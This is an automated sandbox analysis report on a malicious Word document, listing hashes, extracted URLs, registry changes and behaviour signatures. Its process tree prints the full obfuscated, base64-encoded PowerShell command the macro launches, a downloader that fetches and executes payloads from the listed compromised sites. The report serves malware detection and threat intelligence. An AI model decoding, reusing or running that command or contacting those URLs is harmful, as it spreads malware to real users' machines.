Analysis
-
max time kernel
117s -
max time network
118s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
11-09-2024 16:43
Behavioral task
behavioral1
Sample
dac8b9205c259accbbe89544c72c1e29_JaffaCakes118.doc
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
dac8b9205c259accbbe89544c72c1e29_JaffaCakes118.doc
Resource
win10v2004-20240802-en
General
-
Target
dac8b9205c259accbbe89544c72c1e29_JaffaCakes118.doc
-
Size
154KB
-
MD5
dac8b9205c259accbbe89544c72c1e29
-
SHA1
9a462bdd1a6a0bb41562f55b8b325ae48eeb2fb4
-
SHA256
02bda32f554b15fe24cf07bdda78b9962698bbf3abc72889f5191af722807ab1
-
SHA512
1ec9a7ab41655ea00e54051291a57cd8bbe6c8ebf2d0f5bede6c31811a256317b4e4effd342c829735924efd537e5b4d473a8c27b86e9ebf6d02e4224ba8dc75
-
SSDEEP
1536:gURA+F6URA+Fhrdi1Ir77zOH98Wj2gpngd+a9/xQIY0y+Wb9w:frfrzOH98ipgHxDH7A9w
Malware Config
Extracted
http://qstride.com/img/1W/
http://syracusecoffee.com/customer/i/
http://shahrakyar.com/cms/3e/
http://vuatritue.com/wp-admin/FkX/
http://glafka.com/wp-content/2L7/
http://rovrooftiles.com/wp-includes/nDP/
http://paulospainting.com/wp-includes/7k/
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3008 2900 powershell.exe 31 -
Blocklisted process makes network request 10 IoCs
flow pid Process 5 3008 powershell.exe 7 3008 powershell.exe 8 3008 powershell.exe 10 3008 powershell.exe 11 3008 powershell.exe 12 3008 powershell.exe 19 3008 powershell.exe 20 3008 powershell.exe 21 3008 powershell.exe 23 3008 powershell.exe -
Drops file in System32 directory 1 IoCs
description ioc Process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Drops file in Windows directory 1 IoCs
description ioc Process File opened for modification C:\Windows\Debug\WIA\wiatrace.log WINWORD.EXE -
System Location Discovery: System Language Discovery 1 TTPs 1 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WINWORD.EXE -
Office loads VBA resources, possible macro or embedded object present
-
Modifies registry class 64 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000_CLASSES\Interface\{47FF8FE5-6198-11CF-8CE8-00AA006CB389} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000_CLASSES\Interface\{9A4BBF53-4E46-101B-8BBD-00AA003E3B29} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000_CLASSES\Interface\{5B9D8FC8-4A71-101B-97A6-00000B65C08B} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000_CLASSES\Interface\{8BD21D53-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcOptionButton" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000_CLASSES\Wow6432Node\Interface\{796ED650-5FE9-11CF-8D68-00AA00BDCE1D} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000_CLASSES\Interface\{47FF8FE4-6198-11CF-8CE8-00AA006CB389} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000_CLASSES\Interface\{5CEF5613-713D-11CE-80C9-00AA00611080}\ = "IPage" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000_CLASSES\Wow6432Node\Interface\{8BD21D53-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcOptionButton" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000_CLASSES\Interface\{5512D11F-5CC6-11CF-8D67-00AA00BDCE1D} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000_CLASSES\Interface\{978C9E22-D4B0-11CE-BF2D-00AA003F40D0}\ = "LabelControlEvents" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000_CLASSES\Interface\{8BD21D12-EC42-11CE-9E0D-00AA006002F3} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000_CLASSES\Wow6432Node\Interface\{7B020EC8-AF6C-11CE-9F46-00AA00574A4F} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000_CLASSES\Wow6432Node\Interface\{944ACF93-A1E6-11CE-8104-00AA00611080}\ = "Tabs" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000_CLASSES\Wow6432Node\Interface\{8BD21D22-EC42-11CE-9E0D-00AA006002F3} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000_CLASSES\Wow6432Node\Interface\{8BD21D52-EC42-11CE-9E0D-00AA006002F3}\ = "MdcOptionButtonEvents" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000_CLASSES\Wow6432Node\Interface\{47FF8FE9-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents10" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000_CLASSES\Wow6432Node\Interface\{EC72F590-F375-11CE-B9E8-00AA006B1A69} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000_CLASSES\Wow6432Node\Interface\{8BD21D13-EC42-11CE-9E0D-00AA006002F3} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000_CLASSES\Interface\{8BD21D23-EC42-11CE-9E0D-00AA006002F3} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000_CLASSES\Wow6432Node\Interface\{47FF8FE2-6198-11CF-8CE8-00AA006CB389} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000_CLASSES\Wow6432Node\Interface\{5B9D8FC8-4A71-101B-97A6-00000B65C08B} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000_CLASSES\Interface\{7B020EC1-AF6C-11CE-9F46-00AA00574A4F}\ = "CommandButtonEvents" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000_CLASSES\Interface\{7B020EC7-AF6C-11CE-9F46-00AA00574A4F} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000_CLASSES\Wow6432Node\Interface\{5512D123-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLSelect" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000_CLASSES\Wow6432Node\Interface\{7B020EC1-AF6C-11CE-9F46-00AA00574A4F}\ = "CommandButtonEvents" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000_CLASSES\Wow6432Node\Interface\{47FF8FE6-6198-11CF-8CE8-00AA006CB389} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000_CLASSES\Wow6432Node\Interface\{47FF8FE8-6198-11CF-8CE8-00AA006CB389} WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{7834B175-6A51-413B-9394-5E97B8EAD0E6}\2.0\0\win32 WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000_CLASSES\Interface WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000_CLASSES\Interface\{A38BFFC3-A5A0-11CE-8107-00AA00611080} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000_CLASSES\Interface\{5512D115-5CC6-11CF-8D67-00AA00BDCE1D} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000_CLASSES\Interface\{7B020EC8-AF6C-11CE-9F46-00AA00574A4F} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000_CLASSES\Wow6432Node\Interface\{47FF8FE5-6198-11CF-8CE8-00AA006CB389} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000_CLASSES\Wow6432Node\Interface\{92E11A03-7358-11CE-80CB-00AA00611080}\ = "Pages" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000_CLASSES\Interface\{82B02370-B5BC-11CF-810F-00A0C9030074} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000_CLASSES\Interface\{5512D125-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLTextArea" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000_CLASSES\Wow6432Node\Interface\{4C5992A5-6926-101B-9992-00000B65C6F9}\ = "ImageEvents" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000_CLASSES\Wow6432Node\Interface\{47FF8FE2-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents3" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000_CLASSES\Interface\{47FF8FE8-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents9" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000_CLASSES\Wow6432Node\Interface\{04598FC9-866C-11CF-AB7C-00AA00C08FCF}\ = "IMultiPage" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000_CLASSES\Interface\{BEF6E003-A874-101A-8BBA-00AA00300CAB} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000_CLASSES\Interface\{82B02371-B5BC-11CF-810F-00A0C9030074} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000_CLASSES\Wow6432Node\Interface\{8A683C91-BA84-11CF-8110-00A0C9030074}\ = "IReturnEffect" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000_CLASSES\Wow6432Node\Interface\{8BD21D42-EC42-11CE-9E0D-00AA006002F3} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000_CLASSES\Interface\{944ACF93-A1E6-11CE-8104-00AA00611080} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000_CLASSES\Wow6432Node\Interface\{944ACF93-A1E6-11CE-8104-00AA00611080} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000_CLASSES\Wow6432Node\Interface\{5CEF5613-713D-11CE-80C9-00AA00611080} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000_CLASSES\Wow6432Node\Interface\{5512D11F-5CC6-11CF-8D67-00AA00BDCE1D} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000_CLASSES\Interface\{47FF8FE0-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents1" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000_CLASSES\Wow6432Node\Interface\{92E11A03-7358-11CE-80CB-00AA00611080} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000_CLASSES\Wow6432Node\Interface\{8A683C90-BA84-11CF-8110-00A0C9030074}\ = "IReturnSingle" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000_CLASSES\Interface\{8A683C91-BA84-11CF-8110-00A0C9030074} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000_CLASSES\Interface\{7B020EC2-AF6C-11CE-9F46-00AA00574A4F} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000_CLASSES\Interface\{47FF8FE1-6198-11CF-8CE8-00AA006CB389} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000_CLASSES\Wow6432Node\Interface\{CF3F94A0-F546-11CE-9BCE-00AA00608E01}\ = "OptionFrameEvents" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000_CLASSES\Interface\{CF3F94A0-F546-11CE-9BCE-00AA00608E01}\ = "OptionFrameEvents" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000_CLASSES\Interface\{8BD21D23-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcList" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000_CLASSES\Wow6432Node\Interface\{5512D11B-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLText" WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{7834B175-6A51-413B-9394-5E97B8EAD0E6}\2.0\0\win32\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\VBE\\MSForms.exd" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000_CLASSES\TypeLib\{7834B175-6A51-413B-9394-5E97B8EAD0E6}\2.0\FLAGS\ = "6" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000_CLASSES\Wow6432Node\Interface\{8BD21D33-EC42-11CE-9E0D-00AA006002F3} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000_CLASSES\Wow6432Node\Interface\{5CEF5613-713D-11CE-80C9-00AA00611080}\ = "IPage" WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{7834B175-6A51-413B-9394-5E97B8EAD0E6}\2.0\ = "Microsoft Forms 2.0 Object Library" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000_CLASSES\Wow6432Node\Interface\{4C599243-6926-101B-9992-00000B65C6F9} WINWORD.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 2072 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 3008 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 3008 powershell.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
pid Process 2072 WINWORD.EXE 2072 WINWORD.EXE -
Suspicious use of WriteProcessMemory 4 IoCs
description pid Process procid_target PID 2072 wrote to memory of 2180 2072 WINWORD.EXE 35 PID 2072 wrote to memory of 2180 2072 WINWORD.EXE 35 PID 2072 wrote to memory of 2180 2072 WINWORD.EXE 35 PID 2072 wrote to memory of 2180 2072 WINWORD.EXE 35
Processes
-
C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\dac8b9205c259accbbe89544c72c1e29_JaffaCakes118.doc"1⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2072 -
C:\Windows\splwow64.exeC:\Windows\splwow64.exe 122882⤵PID:2180
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -e JABJAGEAOQBpAGEANQA2AD0AKAAnAEYAJwArACcANwAnACsAKAAnAGIAcgBtACcAKwAnAGQANwAnACkAKQA7AC4AKAAnAG4AZQB3AC0AJwArACcAaQB0AGUAbQAnACkAIAAkAGUAbgB2ADoAVQBTAEUAUgBQAHIATwBGAEkAbABFAFwARABnAGcATQBPADkAMQBcAFAAZABOAG8AVQBPAGMAXAAgAC0AaQB0AGUAbQB0AHkAcABlACAARABpAHIAZQBjAFQATwBSAFkAOwBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgAiAFMAZQBDAFUAcgBJAGAAVAB5AFAAYABSAGAATwB0AG8AQwBvAEwAIgAgAD0AIAAoACcAdAAnACsAKAAnAGwAcwAnACsAJwAxADIAJwArACcALAAgAHQAbAAnACkAKwAnAHMAJwArACcAMQAnACsAKAAnADEALAAnACsAJwAgACcAKQArACgAJwB0AGwAJwArACcAcwAnACkAKQA7ACQAUwByAGwAegBhAGsAYgAgAD0AIAAoACgAJwBMACcAKwAnAHUAdwAnACkAKwAoACcAZgBoACcAKwAnADMAXwAnACkAKwAnAHQAJwApADsAJABTAG0AaAA4AGwAbwBsAD0AKAAoACcASAAnACsAJwBuAF8AJwApACsAJwBuADUAJwArACcAbQBsACcAKQA7ACQATABvAG4AOABrAGsAegA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAoACgAJwBDACcAKwAnAFYAVQAnACsAKAAnAEQAZwAnACsAJwBnACcAKQArACcAbQAnACsAKAAnAG8AOQAnACsAJwAxAEMAVgAnACsAJwBVAFAAZABuACcAKwAnAG8AdQAnACkAKwAoACcAbwAnACsAJwBjAEMAVgAnACkAKwAnAFUAJwApACAALQBSAGUAUABMAGEAQwBFACAAIAAoACcAQwBWACcAKwAnAFUAJwApACwAWwBjAEgAQQByAF0AOQAyACkAKwAkAFMAcgBsAHoAYQBrAGIAKwAoACcALgAnACsAKAAnAGUAeAAnACsAJwBlACcAKQApADsAJABWAGYAcwA3AGkAawBzAD0AKAAoACcAVwA5ACcAKwAnAF8AMwA5ACcAKQArACcANQAnACsAJwB1ACcAKQA7ACQASwBwAG4AbwB3AG4AMgA9AC4AKAAnAG4AZQB3AC0AbwBiAGoAZQAnACsAJwBjACcAKwAnAHQAJwApACAAbgBlAHQALgB3AGUAYgBjAGwASQBFAG4AVAA7ACQAUAA3ADUAMgAwAHkAMwA9ACgAJwBoACcAKwAoACcAdAAnACsAJwB0AHAAOgAvACcAKQArACgAJwAvACcAKwAnAHEAcwB0ACcAKwAnAHIAaQAnACsAJwBkAGUALgBjAG8AbQAnACsAJwAvAGkAbQAnACkAKwAnAGcALwAnACsAKAAnADEAJwArACcAVwAvACcAKQArACgAJwAqAGgAdAB0ACcAKwAnAHAAJwArACcAOgAvACcAKwAnAC8AcwB5ACcAKwAnAHIAJwArACcAYQBjAHUAcwBlAGMAbwBmAGYAZQBlACcAKwAnAC4AJwApACsAJwBjAG8AJwArACcAbQAvACcAKwAoACcAYwB1AHMAJwArACcAdAAnACkAKwAoACcAbwBtACcAKwAnAGUAJwApACsAKAAnAHIAJwArACcALwBpACcAKwAnAC8AKgBoAHQAJwApACsAKAAnAHQAcAAnACsAJwA6AC8AJwApACsAJwAvAHMAJwArACgAJwBoAGEAaAAnACsAJwByACcAKQArACgAJwBhAGsAeQBhAHIALgAnACsAJwBjAG8AbQAvAGMAJwArACcAbQBzACcAKQArACcALwAzACcAKwAnAGUALwAnACsAJwAqAGgAJwArACgAJwB0AHQAcAA6ACcAKwAnAC8AJwApACsAJwAvAHYAJwArACcAdQBhACcAKwAoACcAdAByACcAKwAnAGkAJwApACsAJwB0ACcAKwAnAHUAZQAnACsAKAAnAC4AYwBvAG0AJwArACcALwAnACsAJwB3AHAAJwApACsAJwAtAGEAJwArACgAJwBkAG0AaQAnACsAJwBuAC8AJwApACsAKAAnAEYAJwArACcAawBYACcAKQArACgAJwAvACcAKwAnACoAJwArACcAaAB0AHQAcAA6AC8ALwBnACcAKQArACgAJwBsAGEAJwArACcAZgBrAGEAJwArACcALgAnACkAKwAnAGMAJwArACcAbwBtACcAKwAnAC8AdwAnACsAKAAnAHAAJwArACcALQBjACcAKwAnAG8AbgB0AGUAbgB0ACcAKwAnAC8AJwApACsAKAAnADIATAA3AC8AKgAnACsAJwBoAHQAJwApACsAJwB0AHAAJwArACgAJwA6AC8ALwByACcAKwAnAG8AJwArACcAdgByACcAKQArACcAbwAnACsAKAAnAG8AZgB0AGkAbABlACcAKwAnAHMALgAnACsAJwBjAG8AbQAvACcAKwAnAHcAcAAnACkAKwAnAC0AJwArACgAJwBpAG4AYwAnACsAJwBsACcAKQArACcAdQBkACcAKwAoACcAZQAnACsAJwBzAC8AJwArACcAbgBEAFAALwAqAGgAJwApACsAKAAnAHQAdABwADoAJwArACcALwAvAHAAJwApACsAKAAnAGEAdQAnACsAJwBsACcAKwAnAG8AcwBwAGEAaQBuAHQAJwApACsAJwBpAG4AJwArACgAJwBnAC4AYwBvACcAKwAnAG0AJwArACcALwAnACkAKwAoACcAdwBwACcAKwAnAC0AJwApACsAKAAnAGkAbgBjACcAKwAnAGwAJwApACsAKAAnAHUAZABlAHMALwA3ACcAKwAnAGsALwAnACkAKQAuACIAUwBwAGAAbABpAHQAIgAoAFsAYwBoAGEAcgBdADQAMgApADsAJABLAHUAawBzAHkAcQA3AD0AKAAnAFMAYwAnACsAJwBiACcAKwAoACcAMQA4ACcAKwAnAGYAeAAnACkAKQA7AGYAbwByAGUAYQBjAGgAKAAkAFUAcwA4ADIAbABvAGQAIABpAG4AIAAkAFAANwA1ADIAMAB5ADMAKQB7AHQAcgB5AHsAJABLAHAAbgBvAHcAbgAyAC4AIgBEAGAATwB3AE4ATABgAE8AYQBkAEYASQBMAGUAIgAoACQAVQBzADgAMgBsAG8AZAAsACAAJABMAG8AbgA4AGsAawB6ACkAOwAkAEkANQBuAHgAcgB4AHAAPQAoACcAVgAnACsAKAAnAF8AYQAnACsAJwBuACcAKQArACgAJwBwACcAKwAnAHUAcgAnACkAKQA7AEkAZgAgACgAKAAuACgAJwBHAGUAJwArACcAdAAtAEkAJwArACcAdABlAG0AJwApACAAJABMAG8AbgA4AGsAawB6ACkALgAiAEwARQBOAGcAYABUAEgAIgAgAC0AZwBlACAAMgA5ADYAMAAxACkAIAB7AC4AKAAnAEkAJwArACcAbgAnACsAJwB2AG8AawBlAC0ASQB0ACcAKwAnAGUAbQAnACkAKAAkAEwAbwBuADgAawBrAHoAKQA7ACQAWQA5AGoAYwA0AHkAbwA9ACgAJwBCAGcAJwArACgAJwBnAGkANAAnACsAJwBsACcAKQArACcAMQAnACkAOwBiAHIAZQBhAGsAOwAkAFUAcgBlAHEAOQB2ADQAPQAoACcAVwB4ACcAKwAoACcAeQBwACcAKwAnAHQAJwApACsAJwBiAGcAJwApAH0AfQBjAGEAdABjAGgAewB9AH0AJABPADcAOQBpAG8AZgBzAD0AKAAnAFoAJwArACgAJwBvAHAAcgAnACsAJwBqACcAKQArACcAaABjACcAKQA=1⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3008
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
19KB
MD5649924799e69115ff0bdf2aed290628d
SHA1708267c9aac8b3a38e4acdf356dc7cececc7d15e
SHA256ef973e9bdfed0e078cea10d95118176d7e56fb821693c9162102bdec5bc5006c
SHA512939e30537a58297a82b6068001bd920af7817614e85b689b96e815fce767d9a9f14e44c29c3949ecaa9409791f3bd70d3a204f9a40d6814cf2c23e4b0f46aab9